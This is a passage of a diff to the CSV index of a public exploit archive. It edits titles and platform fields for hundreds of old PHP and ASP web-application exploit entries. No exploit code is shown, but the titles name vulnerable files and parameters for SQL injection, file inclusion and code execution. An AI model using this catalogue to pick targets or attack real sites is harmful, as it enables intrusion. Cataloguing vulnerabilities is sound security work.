Inclusion",2006-10-09,K-159,php,webapps,0 2494,platforms/php/webapps/2494.txt,"OpenDock Easy Doc 1.4 - (doc_directory) File Inclusion",2006-10-09,the_day,php,webapps,0 @@ -16687,7 +16688,7 @@ id,file,description,date,author,platform,type,port 2514,platforms/php/webapps/2514.txt,"n@board 3.1.9e - (naboard_pnr.php) Remote File Inclusion",2006-10-11,mdx,php,webapps,0 2516,platforms/php/webapps/2516.pl,"CommunityPortals 1.0 - (import-archive.php) File Inclusion",2006-10-11,"Nima Salehi",php,webapps,0 2517,platforms/php/webapps/2517.pl,"PHP News Reader 2.6.4 - (phpBB.inc.php) Remote File Inclusion",2006-10-11,"Nima Salehi",php,webapps,0 -2518,platforms/php/webapps/2518.txt,"SH-News 3.1 - (scriptpath) Multiple Remote File Inclusion",2006-10-11,v1per-haCker,php,webapps,0 +2518,platforms/php/webapps/2518.txt,"SH-News 3.1 - 'scriptpath' Parameter Remote File Inclusion",2006-10-11,v1per-haCker,php,webapps,0 2519,platforms/php/webapps/2519.txt,"Minichat 6.0 - (ftag.php) Remote File Inclusion",2006-10-11,Zickox,php,webapps,0 2520,platforms/php/webapps/2520.txt,"Softerra PHP Developer Library 1.5.3 - File Inclusion",2006-10-12,MP,php,webapps,0 2521,platforms/php/webapps/2521.txt,"Download-Engine 1.4.2 - (spaw) Remote File Inclusion",2006-10-12,v1per-haCker,php,webapps,0 @@ -16769,7 +16770,7 @@ id,file,description,date,author,platform,type,port 2613,platforms/php/webapps/2613.txt,"Mambo Module MambWeather 1.8.1 - Remote File Inclusion",2006-10-22,h4ntu,php,webapps,0 2614,platforms/php/webapps/2614.txt,"Net_DNS 0.3 - (DNS/RR.php) Remote File Inclusion",2006-10-22,Drago84,php,webapps,0 2615,platforms/php/webapps/2615.txt,"SpeedBerg 1.2beta1 - (SPEEDBERG_PATH) File Inclusion",2006-10-22,k1tk4t,php,webapps,0 -2616,platforms/php/webapps/2616.php,"JaxUltraBB 2.0 - (delete.php) Remote Auto Deface Exploit",2006-10-22,Kacper,php,webapps,0 +2616,platforms/php/webapps/2616.php,"JaxUltraBB 2.0 - 'delete.php' Remote Auto Deface Exploit",2006-10-22,Kacper,php,webapps,0 2617,platforms/php/webapps/2617.php,"PHP-Nuke 7.9 - (Encyclopedia) SQL Injection",2006-10-22,Paisterist,php,webapps,0 2620,platforms/php/webapps/2620.txt,"EZ-Ticket 0.0.1 - 'common.php' Remote File Inclusion",2006-10-22,"the master",php,webapps,0 2621,platforms/php/webapps/2621.txt,"Fully Modded phpBB 2021.4.40 - Multiple File Inclusion",2006-10-23,020,php,webapps,0 @@ -16784,7 +16785,7 @@ id,file,description,date,author,platform,type,port 2632,platforms/php/webapps/2632.pl,"CMS Faethon 2.0 - 'mainpath' Parameter Remote File Inclusion",2006-10-24,r0ut3r,php,webapps,0 2640,platforms/php/webapps/2640.txt,"UeberProject 1.0 - (login/secure.php) Remote File Inclusion",2006-10-24,"Mehmet Ince",php,webapps,0 2642,platforms/asp/webapps/2642.asp,"Berty Forum 1.4 - 'index.php' Blind SQL Injection",2006-10-24,ajann,asp,webapps,0 -2643,platforms/php/webapps/2643.php,"JaxUltraBB 2.0 - Topic Reply Command Execution",2006-10-24,BlackHawk,php,webapps,0 +2643,platforms/php/webapps/2643.php,"JaxUltraBB 2.0 - Command Execution",2006-10-24,BlackHawk,php,webapps,0 2644,platforms/php/webapps/2644.php,"Discuz! 5.0.0 GBK - SQL Injection / Admin Credentials Disclosure",2006-10-25,rgod,php,webapps,0 2645,platforms/php/webapps/2645.txt,"ArticleBeach Script 2.0 - 'index.php' Remote File Inclusion",2006-10-25,Bithedz,php,webapps,0 2646,platforms/php/webapps/2646.txt,"TextPattern 1.19 - (publish.php) Remote File Inclusion",2006-10-25,Bithedz,php,webapps,0 @@ -16905,7 +16906,7 @@ id,file,description,date,author,platform,type,port 2799,platforms/php/webapps/2799.txt,"mxBB Module calsnails 1.06 - (mx_common.php) File Inclusion",2006-11-17,bd0rk,php,webapps,0 2807,platforms/php/webapps/2807.pl,"Joomla! Component MosReporter 0.9.3 - Remote File Inclusion",2006-11-17,Crackers_Child,php,webapps,0 2808,platforms/php/webapps/2808.txt,"Dicshunary 0.1a - (check_status.php) Remote File Inclusion",2006-11-17,DeltahackingTEAM,php,webapps,0 -2810,platforms/php/webapps/2810.php,"Oxygen 1.1.3 - (O2PHP Bulletin Board) SQL Injection",2006-11-18,DarkFig,php,webapps,0 +2810,platforms/php/webapps/2810.php,"Oxygen 1.1.3 (O2PHP Bulletin Board) - SQL Injection",2006-11-18,DarkFig,php,webapps,0 2811,platforms/php/webapps/2811.txt,"PHPWebThings 1.5.2 - (editor.php) Remote File Inclusion",2006-11-18,nuffsaid,php,webapps,0 2812,platforms/php/webapps/2812.pl,"PHP Easy Downloader 1.5 - (save.php) Remote Code Execution",2006-11-18,nuffsaid,php,webapps,0 2813,platforms/asp/webapps/2813.txt,"ASPNuke 0.80 - (register.asp) SQL Injection",2006-11-19,ajann,asp,webapps,0 @@ -16961,7 +16962,7 @@ id,file,description,date,author,platform,type,port 2888,platforms/php/webapps/2888.php,"Envolution 1.1.0 - (PNSVlang) Remote Code Execution",2006-12-03,Kacper,php,webapps,0 2889,platforms/php/webapps/2889.pl,"QuickCart 2.0 - (categories.php) Local File Inclusion",2006-12-03,r0ut3r,php,webapps,0 2890,platforms/php/webapps/2890.txt,"PHP-revista 1.1.2 - (adodb) Multiple Remote File Inclusion",2006-12-03,"Cold Zero",php,webapps,0 -2891,platforms/php/webapps/2891.txt,"cutenews aj-fork 167f - (cutepath) Remote File Inclusion",2006-12-04,DeltahackingTEAM,php,webapps,0 +2891,platforms/php/webapps/2891.txt,"cutenews aj-fork 167f - 'cutepath' Parameter Remote File Inclusion",2006-12-04,DeltahackingTEAM,php,webapps,0 2894,platforms/php/webapps/2894.txt,"Phorum 3.2.11 - 'common.php' Remote File Inclusion",2006-12-06,Mr-m07,php,webapps,0 2895,platforms/php/webapps/2895.pl,"J-OWAMP Web Interface 2.1b - (link) Remote File Inclusion",2006-12-07,3l3ctric-Cracker,php,webapps,0 2896,platforms/php/webapps/2896.txt,"Tucows Client Code Suite (CSS) 1.2.1015 - File Inclusion",2006-12-08,3l3ctric-Cracker,php,webapps,0 @@ -17019,7 +17020,7 @@ id,file,description,date,author,platform,type,port 2981,platforms/php/webapps/2981.php,"open NewsLetter 2.5 - Multiple Vulnerabilities (2)",2006-12-23,BlackHawk,php,webapps,0 2982,platforms/php/webapps/2982.txt,"3editor CMS 0.42 - 'index.php' Local File Inclusion",2006-12-22,3l3ctric-Cracker,php,webapps,0 2983,platforms/php/webapps/2983.txt,"b2 Blog 0.5 - (b2verifauth.php) Remote File Inclusion",2006-12-23,mdx,php,webapps,0 -2984,platforms/php/webapps/2984.txt,"SH-News 0.93 - (misc.php) Remote File Inclusion",2006-12-23,bd0rk,php,webapps,0 +2984,platforms/php/webapps/2984.txt,"SH-News 0.93 - 'misc.php' Remote File Inclusion",2006-12-23,bd0rk,php,webapps,0 2986,platforms/asp/webapps/2986.txt,"Enthrallweb ePhotos 1.0 - (subLevel2.asp) SQL Injection",2006-12-23,ajann,asp,webapps,0 2987,platforms/asp/webapps/2987.txt,"Enthrallweb eHomes 1.0 - Multiple (SQL Injection / Cross-Site Scripting) Vulnerabilities",2006-12-23,ajann,asp,webapps,0 2988,platforms/asp/webapps/2988.pl,"Enthrallweb eJobs - 'newsdetail.asp' SQL Injection",2006-12-23,ajann,asp,webapps,0 @@ -17361,7 +17362,7 @@ id,file,description,date,author,platform,type,port 3542,platforms/php/webapps/3542.txt,"ClassWeb 2.0.3 - (BASE) Remote File Inclusion",2007-03-22,GoLd_M,php,webapps,0 3543,platforms/php/webapps/3543.pl,"PortailPhp 2.0 - (idnews) SQL Injection",2007-03-22,"Mehmet Ince",php,webapps,0 3545,platforms/php/webapps/3545.txt,"Lms 1.8.9 - Vala Remote File Inclusion",2007-03-22,Kacper,php,webapps,0 -3546,platforms/asp/webapps/3546.txt,"aspWebCalendar 4.5 - (calendar.asp eventid) SQL Injection",2007-03-22,parad0x,asp,webapps,0 +3546,platforms/asp/webapps/3546.txt,"AspWebCalendar 4.5 - 'eventid' Parameter SQL Injection",2007-03-22,parad0x,asp,webapps,0 3548,platforms/php/webapps/3548.pl,"RoseOnlineCMS 3 beta2 - (op) Local File Inclusion",2007-03-23,GoLd_M,php,webapps,0 3549,platforms/asp/webapps/3549.txt,"Active Trade 2 - 'default.asp catid' SQL Injection",2007-03-23,CyberGhost,asp,webapps,0 3550,platforms/asp/webapps/3550.txt,"ActiveBuyandSell 6.2 - (buyersend.asp catid) SQL Injection",2007-03-23,CyberGhost,asp,webapps,0 @@ -18076,7 +18077,7 @@ id,file,description,date,author,platform,type,port 4706,platforms/php/webapps/4706.txt,"Content Injector 1.53 - 'index.php' SQL Injection",2007-12-09,S.W.A.T.,php,webapps,0 4707,platforms/php/webapps/4707.txt,"Ace Image Hosting Script - 'id' SQL Injection",2007-12-09,t0pP8uZz,php,webapps,0 4708,platforms/php/webapps/4708.txt,"DWdirectory 2.1 - SQL Injection",2007-12-09,t0pP8uZz,php,webapps,0 -4709,platforms/php/webapps/4709.txt,"SH-News 3.0 - (comments.php id) SQL Injection",2007-12-09,hadihadi,php,webapps,0 +4709,platforms/php/webapps/4709.txt,"SH-News 3.0 - 'comments.php' SQL Injection",2007-12-09,hadihadi,php,webapps,0 4710,platforms/php/webapps/4710.txt,"Lotfian.com DATABASE DRIVEN TRAVEL SITE - SQL Injection",2007-12-10,"Aria-Security Team",php,webapps,0 4711,platforms/php/webapps/4711.txt,"Falt4 CMS rc4 10.9.2007 - Multiple Vulnerabilities",2007-12-10,"H-Security Labs",php,webapps,0 4712,platforms/php/webapps/4712.txt,"falcon CMS 1.4.3 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2007-12-10,MhZ91,php,webapps,0 @@ -18163,7 +18164,7 @@ id,file,description,date,author,platform,type,port 4826,platforms/php/webapps/4826.pl,"WebPortal CMS 0.6.0 - 'index.php' SQL Injection",2007-12-31,x0kster,php,webapps,0 4827,platforms/php/webapps/4827.txt,"Joomla! Component PU Arcade 2.1.3 - SQL Injection",2007-12-31,Houssamix,php,webapps,0 4828,platforms/php/webapps/4828.txt,"AGENCY4NET WEBFTP 1 - download2.php File Disclosure",2008-01-01,GoLd_M,php,webapps,0 -4830,platforms/php/webapps/4830.txt,"ClipShare - 'uprofile.php UID' SQL Injection",2008-01-02,Krit,php,webapps,0 +4830,platforms/php/webapps/4830.txt,"ClipShare - 'UID' Parameter SQL Injection",2008-01-02,Krit,php,webapps,0 4831,platforms/php/webapps/4831.txt,"MyPHP Forum 3.0 - (Final) SQL Injection",2008-01-03,The:Paradox,php,webapps,0 4832,platforms/php/webapps/4832.php,"Site@School 2.4.10 - Blind SQL Injection",2008-01-03,EgiX,php,webapps,0 4833,platforms/php/webapps/4833.txt,"NetRisk 1.9.7 - Remote / Local File Inclusion",2008-01-04,S.W.A.T.,php,webapps,0 @@ -18614,7 +18615,7 @@ id,file,description,date,author,platform,type,port 5449,platforms/php/webapps/5449.php,"KwsPHP - (Upload) Remote Code Execution",2008-04-14,Ajax,php,webapps,0 5450,platforms/php/webapps/5450.txt,"Classifieds Caffe - 'cat_id' Parameter SQL Injection",2008-04-15,JosS,php,webapps,0 5452,platforms/php/webapps/5452.txt,"LightNEasy sqlite / no database 1.2.2 - Multiple Vulnerabilities",2008-04-15,girex,php,webapps,0 -5454,platforms/php/webapps/5454.txt,"Lasernet CMS 1.5 - SQL Injection (2)",2008-04-15,cO2,php,webapps,0 +5454,platforms/php/webapps/5454.txt,"LaserNet CMS 1.5 - SQL Injection (2)",2008-04-15,cO2,php,webapps,0 5456,platforms/asp/webapps/5456.txt,"Carbon Communities 2.4 - Multiple Vulnerabilities",2008-04-16,BugReport.IR,asp,webapps,0 5457,platforms/php/webapps/5457.txt,"XplodPHP AutoTutorials 2.1 - 'id' Parameter SQL Injection",2008-04-16,cO2,php,webapps,0 5459,platforms/php/webapps/5459.txt,"e107 module 123 flash chat 6.8.0 - Remote File Inclusion",2008-04-17,by_casper41,php,webapps,0 @@ -18921,70 +18922,70 @@ id,file,description,date,author,platform,type,port 5823,platforms/php/webapps/5823.txt,"Advanced Webhost Billing System (AWBS) 2.7.1 - 'news.php' SQL Injection",2008-06-15,Mr.SQL,php,webapps,0 5824,platforms/php/webapps/5824.txt,"Anata CMS 1.0b5 - 'change.php' Arbitrary Add Admin",2008-06-15,"CWH Underground",php,webapps,0 5826,platforms/php/webapps/5826.py,"Simple Machines Forum (SMF) 1.1.4 - SQL Injection",2008-06-15,The:Paradox,php,webapps,0 -5828,platforms/php/webapps/5828.txt,"Oxygen 2.0 - (repquote) SQL Injection",2008-06-15,anonymous,php,webapps,0 +5828,platforms/php/webapps/5828.txt,"Oxygen 2.0 - 'repquote' Parameter SQL Injection",2008-06-15,anonymous,php,webapps,0 5829,platforms/php/webapps/5829.txt,"SH-News 3.0 - Insecure Cookie Handling",2008-06-15,"Virangar Security",php,webapps,0 5830,platforms/php/webapps/5830.txt,"Nitro Web Gallery 1.4.3 - (section) SQL Injection",2008-06-16,Mr.SQL,php,webapps,0 -5831,platforms/php/webapps/5831.txt,"Open Azimyt CMS 0.22 - 'lang' Local File Inclusion",2008-06-16,DSecRG,php,webapps,0 +5831,platforms/php/webapps/5831.txt,"Open Azimyt CMS 0.22 - 'lang' Parameter Local File Inclusion",2008-06-16,DSecRG,php,webapps,0 5832,platforms/php/webapps/5832.pl,"MyMarket 1.72 - Blind SQL Injection",2008-06-16,anonymous,php,webapps,0 -5833,platforms/php/webapps/5833.txt,"Joomla! Component Simple Shop Galore 3.x - 'catid' SQL Injection",2008-06-16,eXeCuTeR,php,webapps,0 +5833,platforms/php/webapps/5833.txt,"Joomla! Component Simple Shop Galore 3.x - 'catid' Parameter SQL Injection",2008-06-16,eXeCuTeR,php,webapps,0 5834,platforms/php/webapps/5834.pl,"Comparison Engine Power 1.0 - Blind SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 -5835,platforms/php/webapps/5835.txt,"Bizon-CMS 2.0 - (index.php Id) SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 -5836,platforms/php/webapps/5836.txt,"Basic-CMS - 'index.php r' SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 +5835,platforms/php/webapps/5835.txt,"Bizon-CMS 2.0 - 'Id' Parameter SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 +5836,platforms/php/webapps/5836.txt,"Basic-CMS - 'index.php' SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 5838,platforms/php/webapps/5838.txt,"FreeCMS.us 0.2 - 'index.php' SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 -5839,platforms/php/webapps/5839.txt,"ClipShare < 3.0.1 - (tid) SQL Injection",2008-06-17,SuNHouSe2,php,webapps,0 -5840,platforms/php/webapps/5840.txt,"easyTrade 2.x - (detail.php id) SQL Injection",2008-06-17,anonymous,php,webapps,0 -5841,platforms/php/webapps/5841.txt,"ThaiQuickCart - (sLanguage) Local File Inclusion",2008-06-17,"CWH Underground",php,webapps,0 +5839,platforms/php/webapps/5839.txt,"ClipShare < 3.0.1 - 'tid' Parameter SQL Injection",2008-06-17,SuNHouSe2,php,webapps,0 +5840,platforms/php/webapps/5840.txt,"easyTrade 2.x - 'id' Parameter SQL Injection",2008-06-17,anonymous,php,webapps,0 +5841,platforms/php/webapps/5841.txt,"ThaiQuickCart 3 - 'sLanguage' Cookie Local File Inclusion",2008-06-17,"CWH Underground",php,webapps,0 5842,platforms/php/webapps/5842.txt,"PHP Site Lock 2.0 - 'index.php' SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 5844,platforms/php/webapps/5844.php,"FreeCMS.us 0.2 - 'FCKeditor' Arbitrary File Upload",2008-06-17,Stack,php,webapps,0 5845,platforms/php/webapps/5845.txt,"MyShoutPro 1.2 - Final Insecure Cookie Handling",2008-06-17,Stack,php,webapps,0 -5846,platforms/php/webapps/5846.txt,"eroCMS 1.4 - (index.php site) SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 -5847,platforms/php/webapps/5847.txt,"WebCalendar 1.0.4 - (includedir) Remote File Inclusion",2008-06-17,Cr@zy_King,php,webapps,0 -5848,platforms/php/webapps/5848.txt,"traindepot 0.1 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-18,"CWH Underground",php,webapps,0 -5849,platforms/asp/webapps/5849.txt,"doITlive CMS 2.50 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-18,BugReport.IR,asp,webapps,0 -5850,platforms/php/webapps/5850.txt,"AspWebCalendar 2008 - Arbitrary File Upload",2008-06-18,Alemin_Krali,php,webapps,0 -5852,platforms/php/webapps/5852.txt,"netBIOS - 'shownews.php newsid' SQL Injection",2008-06-18,"security fears team",php,webapps,0 -5853,platforms/php/webapps/5853.txt,"Maxtrade AIO 1.3.23 - (categori) SQL Injection",2008-06-18,HaCkeR_EgY,php,webapps,0 -5854,platforms/php/webapps/5854.txt,"Mybizz-Classifieds - 'index.php cat' SQL Injection",2008-06-18,HaCkeR_EgY,php,webapps,0 -5855,platforms/php/webapps/5855.txt,"Easy Webstore 1.2 - (index.php postid) SQL Injection",2008-06-18,Mr.SQL,php,webapps,0 +5846,platforms/php/webapps/5846.txt,"eroCMS 1.4 - 'site' Parameter SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 +5847,platforms/php/webapps/5847.txt,"WebCalendar 1.0.4 - 'includedir' Parameter Remote File Inclusion",2008-06-17,Cr@zy_King,php,webapps,0 +5848,platforms/php/webapps/5848.txt,"traindepot 0.1 - Local File Inclusion / Cross-Site Scripting",2008-06-18,"CWH Underground",php,webapps,0 +5849,platforms/asp/webapps/5849.txt,"doITlive CMS 2.50 - SQL Injection / Cross-Site Scripting",2008-06-18,BugReport.IR,asp,webapps,0 +5850,platforms/asp/webapps/5850.txt,"AspWebCalendar 2008 - Arbitrary File Upload",2008-06-18,Alemin_Krali,asp,webapps,0 +5852,platforms/php/webapps/5852.txt,"netBIOS - 'newsid' Parameter SQL Injection",2008-06-18,"security fears team",php,webapps,0 +5853,platforms/php/webapps/5853.txt,"Maxtrade AIO 1.3.23 - 'categori' Parameter SQL Injection",2008-06-18,HaCkeR_EgY,php,webapps,0 +5854,platforms/php/webapps/5854.txt,"Mybizz-Classifieds - 'cat' Parameter SQL Injection",2008-06-18,HaCkeR_EgY,php,webapps,0 +5855,platforms/php/webapps/5855.txt,"Easy Webstore 1.2 - SQL Injection",2008-06-18,Mr.SQL,php,webapps,0 5856,platforms/php/webapps/5856.txt,"nweb2fax 0.2.7 - Multiple Vulnerabilities",2008-06-18,dun,php,webapps,0 -5857,platforms/php/webapps/5857.txt,"Carscripts Classifieds - 'index.php cat' SQL Injection",2008-06-18,Stack,php,webapps,0 -5858,platforms/php/webapps/5858.txt,"BoatScripts Classifieds - 'index.php type' SQL Injection",2008-06-18,Stack,php,webapps,0 +5857,platforms/php/webapps/5857.txt,"Carscripts Classifieds - 'cat' Parameter SQL Injection",2008-06-18,Stack,php,webapps,0 +5858,platforms/php/webapps/5858.txt,"BoatScripts Classifieds - 'type' Parameter SQL Injection",2008-06-18,Stack,php,webapps,0 5859,platforms/php/webapps/5859.txt,"eLineStudio Site Composer (ESC) 2.6 - Multiple Vulnerabilities",2008-06-19,BugReport.IR,php,webapps,0 -5860,platforms/php/webapps/5860.txt,"ownrs blog beta3 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-19,"CWH Underground",php,webapps,0 -5861,platforms/php/webapps/5861.txt,"Academic Web Tools CMS 1.4.2.8 - Multiple Vulnerabilities",2008-06-19,BugReport.IR,php,webapps,0 -5862,platforms/php/webapps/5862.txt,"samart-cms 2.0 - (contentsid) SQL Injection",2008-06-19,dun,php,webapps,0 -5863,platforms/php/webapps/5863.txt,"CMS-BRD - (menuclick) SQL Injection",2008-06-19,dun,php,webapps,0 +5860,platforms/php/webapps/5860.txt,"ownrs blog beta3 - SQL Injection / Cross-Site Scripting",2008-06-19,"CWH Underground",php,webapps,0 +5861,platforms/php/webapps/5861.txt,"Yektaweb Academic Web Tools CMS 1.4.2.8 - Multiple Vulnerabilities",2008-06-19,BugReport.IR,php,webapps,0 +5862,platforms/php/webapps/5862.txt,"samart-cms 2.0 - 'contentsid' Parameter SQL Injection",2008-06-19,dun,php,webapps,0 +5863,platforms/php/webapps/5863.txt,"CMS-BRD - 'menuclick' Parameter SQL Injection",2008-06-19,dun,php,webapps,0 5864,platforms/php/webapps/5864.txt,"Orlando CMS 0.6 - Remote File Inclusion",2008-06-19,Ciph3r,php,webapps,0 -5865,platforms/php/webapps/5865.txt,"CaupoShop Classic 1.3 - (saArticle[ID]) SQL Injection",2008-06-19,anonymous,php,webapps,0 +5865,platforms/php/webapps/5865.txt,"CaupoShop Classic 1.3 - 'saArticle[ID]' SQL Injection",2008-06-19,anonymous,php,webapps,0 5866,platforms/php/webapps/5866.txt,"Lotus Core CMS 1.0.1 - Remote File Inclusion",2008-06-19,Ciph3r,php,webapps,0 5867,platforms/php/webapps/5867.txt,"AJ Auction Web 2.0 - 'cate_id' Parameter SQL Injection",2008-06-19,"Hussin X",php,webapps,0 5868,platforms/php/webapps/5868.txt,"AJ Auction 1.0 - 'id' Parameter SQL Injection",2008-06-19,"Hussin X",php,webapps,0 -5869,platforms/php/webapps/5869.txt,"Virtual Support Office XP 3.0.29 - Multiple Vulnerabilities",2008-06-20,BugReport.IR,php,webapps,0 +5869,platforms/asp/webapps/5869.txt,"Virtual Support Office XP 3.0.29 - Multiple Vulnerabilities",2008-06-20,BugReport.IR,asp,webapps,0 5870,platforms/php/webapps/5870.txt,"GL-SH Deaf Forum 6.5.5 - Multiple Vulnerabilities",2008-06-20,BugReport.IR,php,webapps,0 5871,platforms/php/webapps/5871.txt,"FireAnt 1.3 - 'index.php' Local File Inclusion",2008-06-20,cOndemned,php,webapps,0 5872,platforms/php/webapps/5872.txt,"FubarForum 1.5 - 'index.php' Local File Inclusion",2008-06-20,cOndemned,php,webapps,0 -5873,platforms/php/webapps/5873.txt,"Lightweight news portal [lnp] 1.0b - Multiple Vulnerabilities",2008-06-20,storm,php,webapps,0 +5873,platforms/php/webapps/5873.txt,"Lightweight news portal (LNP) 1.0b - Multiple Vulnerabilities",2008-06-20,storm,php,webapps,0 5874,platforms/php/webapps/5874.txt,"IPTBB 0.5.6 - 'act' Parameter Local File Inclusion",2008-06-20,storm,php,webapps,0 -5875,platforms/php/webapps/5875.txt,"CiBlog 3.1 - (links-extern.php id) SQL Injection",2008-06-20,Mr.SQL,php,webapps,0 +5875,platforms/php/webapps/5875.txt,"CiBlog 3.1 - 'id' Parameter SQL Injection",2008-06-20,Mr.SQL,php,webapps,0 5876,platforms/php/webapps/5876.txt,"Jamroom 3.3.5 - Remote File Inclusion",2008-06-20,cyberlog,php,webapps,0 -5877,platforms/php/webapps/5877.txt,"jaxultrabb 2.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-20,"CWH Underground",php,webapps,0 -5878,platforms/php/webapps/5878.txt,"emuCMS 0.3 - 'cat_id' SQL Injection",2008-06-20,TurkishWarriorr,php,webapps,0 -5879,platforms/php/webapps/5879.txt,"phpAuction - 'profile.php user_id' SQL Injection",2008-06-20,Mr.SQL,php,webapps,0 -5880,platforms/php/webapps/5880.txt,"SiteXS CMS 0.1.1 - (Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-21,"CWH Underground",php,webapps,0 -5881,platforms/php/webapps/5881.txt,"@CMS 2.1.1 - (readarticle.php article_id) SQL Injection",2008-06-21,Mr.SQL,php,webapps,0 -5882,platforms/php/webapps/5882.txt,"eNews 0.1 - (delete.php) Arbitrary Delete Post",2008-06-21,"ilker Kandemir",php,webapps,0 -5883,platforms/php/webapps/5883.txt,"PHP KnowledgeBase Script 2.4 - 'cat_id' SQL Injection",2008-06-21,"S.L TEAM",php,webapps,0 +5877,platforms/php/webapps/5877.txt,"jaxultrabb 2.0 - Local File Inclusion / Cross-Site Scripting",2008-06-20,"CWH Underground",php,webapps,0 +5878,platforms/php/webapps/5878.txt,"emuCMS 0.3 - 'cat_id' Parameter SQL Injection",2008-06-20,TurkishWarriorr,php,webapps,0 +5879,platforms/php/webapps/5879.txt,"phpAuction - 'profile.php' SQL Injection",2008-06-20,Mr.SQL,php,webapps,0 +5880,platforms/php/webapps/5880.txt,"SiteXS CMS 0.1.1 - Arbitrary File Upload / Cross-Site Scripting",2008-06-21,"CWH Underground",php,webapps,0 +5881,platforms/php/webapps/5881.txt,"@CMS 2.1.1 - SQL Injection",2008-06-21,Mr.SQL,php,webapps,0 +5882,platforms/php/webapps/5882.txt,"eNews 0.1 - 'delete.php' Arbitrary Delete Post",2008-06-21,"ilker Kandemir",php,webapps,0 +5883,platforms/php/webapps/5883.txt,"PHP KnowledgeBase Script 2.4 - 'cat_id' Parameter SQL Injection",2008-06-21,"S.L TEAM",php,webapps,0 5884,platforms/php/webapps/5884.txt,"Aprox CMS Engine 5 (1.0.4) - Local File Inclusion",2008-06-21,SkyOut,php,webapps,0 5885,platforms/php/webapps/5885.pl,"Scientific Image DataBase 0.41 - Blind SQL Injection",2008-06-21,t0pP8uZz,php,webapps,0 5886,platforms/php/webapps/5886.pl,"LaserNet CMS 1.5 - Arbitrary File Upload",2008-06-21,t0pP8uZz,php,webapps,0 5887,platforms/php/webapps/5887.pl,"LE.CMS 1.4 - Arbitrary File Upload",2008-06-21,t0pP8uZz,php,webapps,0 5888,platforms/php/webapps/5888.txt,"CCLeague Pro 1.2 - Insecure Cookie Authentication",2008-06-21,t0pP8uZz,php,webapps,0 -5889,platforms/php/webapps/5889.txt,"OFFL 0.2.6 - (teams.php fflteam) SQL Injection",2008-06-21,t0pP8uZz,php,webapps,0 +5889,platforms/php/webapps/5889.txt,"Online Fantasy Football League (OFFL) 0.2.6 - 'teams.php' SQL Injection",2008-06-21,t0pP8uZz,php,webapps,0 5890,platforms/php/webapps/5890.txt,"AJ HYIP ACME - 'news.php' SQL Injection",2008-06-21,"Hussin X",php,webapps,0 -5892,platforms/php/webapps/5892.txt,"phpAuction 3.2.1 - (item.php id) SQL Injection",2008-06-21,"Hussin X",php,webapps,0 -5893,platforms/php/webapps/5893.txt,"Joomla! Component EXP Shop - 'catid' SQL Injection",2008-06-22,His0k4,php,webapps,0 -5894,platforms/asp/webapps/5894.txt,"DUdForum 3.0 - (forum.asp iFor) SQL Injection",2008-06-22,Bl@ckbe@rD,asp,webapps,0 -5895,platforms/php/webapps/5895.txt,"shibby shop 2.2 - (SQL Injection / update) Multiple Vulnerabilities",2008-06-22,KnocKout,php,webapps,0 +5892,platforms/php/webapps/5892.txt,"phpAuction 3.2.1 - 'item.php' SQL Injection",2008-06-21,"Hussin X",php,webapps,0 +5893,platforms/php/webapps/5893.txt,"Joomla! Component EXP Shop - 'catid' Parameter SQL Injection",2008-06-22,His0k4,php,webapps,0 +5894,platforms/asp/webapps/5894.txt,"DUdForum 3.0 - 'iFor' Parameter SQL Injection",2008-06-22,Bl@ckbe@rD,asp,webapps,0 +5895,platforms/php/webapps/5895.txt,"shibby shop 2.2 - Multiple Vulnerabilities",2008-06-22,KnocKout,php,webapps,0 5896,platforms/php/webapps/5896.txt,"CMS Mini 0.2.2 - Multiple Local File Inclusion",2008-06-22,"CWH Underground",php,webapps,0 5897,platforms/php/webapps/5897.txt,"phpDMCA 1.0.0 - Multiple Remote File Inclusion",2008-06-22,CraCkEr,php,webapps,0 5898,platforms/php/webapps/5898.pl,"IGSuite 3.2.4 - (reverse shell) Blind SQL Injection",2008-06-22,"Guido Landi",php,webapps,0 @@ -19238,7 +19239,7 @@ id,file,description,date,author,platform,type,port 6204,platforms/php/webapps/6204.txt,"Plogger 3.0 - SQL Injection",2008-08-05,"GulfTech Security",php,webapps,0 6205,platforms/php/webapps/6205.txt,"iges CMS 2.0 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-08-05,BugReport.IR,php,webapps,0 6206,platforms/php/webapps/6206.txt,"LiteNews 0.1 - Insecure Cookie Handling",2008-08-05,Scary-Boys,php,webapps,0 -6207,platforms/php/webapps/6207.txt,"LiteNews 0.1 - 'id' SQL Injection",2008-08-05,Stack,php,webapps,0 +6207,platforms/php/webapps/6207.txt,"LiteNews 0.1 - 'id' Parameter SQL Injection",2008-08-05,Stack,php,webapps,0 6208,platforms/php/webapps/6208.txt,"Multiple Wsn Products - (Local File Inclusion) Code Execution",2008-08-06,otmorozok428,php,webapps,0 6209,platforms/php/webapps/6209.rb,"LoveCMS 1.6.2 Final - Remote Code Execution",2008-08-06,PoMdaPiMp,php,webapps,0 6210,platforms/php/webapps/6210.rb,"LoveCMS 1.6.2 Final - Update Settings Remote Exploit",2008-08-06,PoMdaPiMp,php,webapps,0 @@ -19929,7 +19930,7 @@ id,file,description,date,author,platform,type,port 7122,platforms/php/webapps/7122.txt,"GS Real Estate Portal - Multiple SQL Injections",2008-11-14,InjEctOr5,php,webapps,0 7123,platforms/php/webapps/7123.txt,"X7 Chat 2.0.5 - (Authentication Bypass) SQL Injection",2008-11-14,ZoRLu,php,webapps,0 7124,platforms/php/webapps/7124.txt,"TurnkeyForms Text Link Sales - 'id' Cross-Site Scripting / SQL Injection",2008-11-14,ZoRLu,php,webapps,0 -7128,platforms/php/webapps/7128.txt,"ClipShare Pro 2006-2007 - (chid) SQL Injection",2008-11-15,snakespc,php,webapps,0 +7128,platforms/php/webapps/7128.txt,"ClipShare Pro 2006-2007 - 'chid' 